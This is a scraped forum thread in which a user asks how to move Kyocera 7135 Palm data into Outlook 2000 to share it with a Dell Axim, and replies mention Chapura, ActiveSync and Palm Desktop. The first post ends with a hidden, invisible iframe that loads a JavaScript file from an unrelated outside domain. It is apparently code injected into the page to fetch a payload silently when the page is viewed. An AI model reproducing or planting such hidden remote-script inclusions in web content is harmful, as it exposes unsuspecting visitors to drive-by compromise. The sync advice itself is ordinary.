+ Reply to Thread

Transferring date to Outlook

I just received my 7135 and wanted to know how to transfer all of my data (calander, contacts, etc) to MS Outlook 2000. I have no data in Outlook yet but just purchased a Dell Axim which uses MS Pocket PC, so I think I have no choice but to use Outlook. The Dell Axim will be used as an in vehicle navigation device with a Holux GPS CF card and Mapoplis software. I want to be able to have the same set of information on the Palm device (Kyocera 7135) and the Pocket PC device (Dell Axim). Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Look for "Chapura" on the 7135 CD. I don't use it personally & I certainly don't sync two devices, especialy such different devices with Outlook so I can't offer any assistance with setting it up, however others here have so I'd suggest searching the forums here if you need more help. good luck... Let us know what you learn and please feel free to give us a comparison review between those two devices. I'm curious as to the Axim batterylife compared to the 7135...Dell at least offers a Extended battery
    iPhone therefore iAm.

Steve,

I too went from an ipaq to the 7135. Are you saying you never used activesycn with the dell? If you have a lot of info, then obviously you have to get it all into outlook. then you need to delete active synce and follow the isntructions carefully for setting up the 7135. yu have to bascically install the palm desktop software first and then do the sync. All the instructions are there in the manual and the cd.

Larry